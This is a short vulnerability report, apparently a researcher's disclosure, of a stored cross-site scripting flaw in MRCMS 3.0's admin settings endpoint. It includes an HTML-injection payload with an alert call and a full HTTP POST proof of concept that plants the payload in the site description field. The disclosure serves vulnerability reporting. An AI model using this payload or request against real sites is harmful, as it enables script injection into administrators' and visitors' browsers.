MRCMS 3.0 There is an xss cross-site scripting vulnerability /admin/system/saveinfo.do

[wy876]

Build the source code locally by downloading https://gitee.com/marker/MRCMS

The vulnerability exists: http://127.0.0.1:8080/admin/index.do

Insert xss cross-site scripting attack code

"><img src=1 onerror=alert(/xss/)>

POC:

POST /admin/system/saveinfo.do HTTP/1.1
Host: 127.0.0.1:8080
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8080/admin/index.do
Origin: http://127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Sec-Fetch-Mode: cors
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 844

config.title=蘑菇建站系统&config.url=http://cms.yl-blog.com/&config.keywords=蘑菇建站系统&config.description=蘑菇建站系统"><img src=1 onerror=alert(/xss/)>&config.mastermail=admin@wuweibi.com&config.mobile=&config.qq=&config.copyright=版权所有©蘑菇建站系统&config.icp=蜀ICP备09035816号-2&config.defaultlang=zh-CN&config.statistics=true&config.index_page=index&config.error_page=error.html&config.themes_active=flatweb&config.themes_cache=temp/&config.dev_mode=true&config.gzip=true&config.compress=false&config.statichtml=false&config.filePath=&config.themesPath=&config.loginSafe=&config.tongjiScirpt=

Visit http://127.0.0.1:8080/about/us.html to trigger xss payload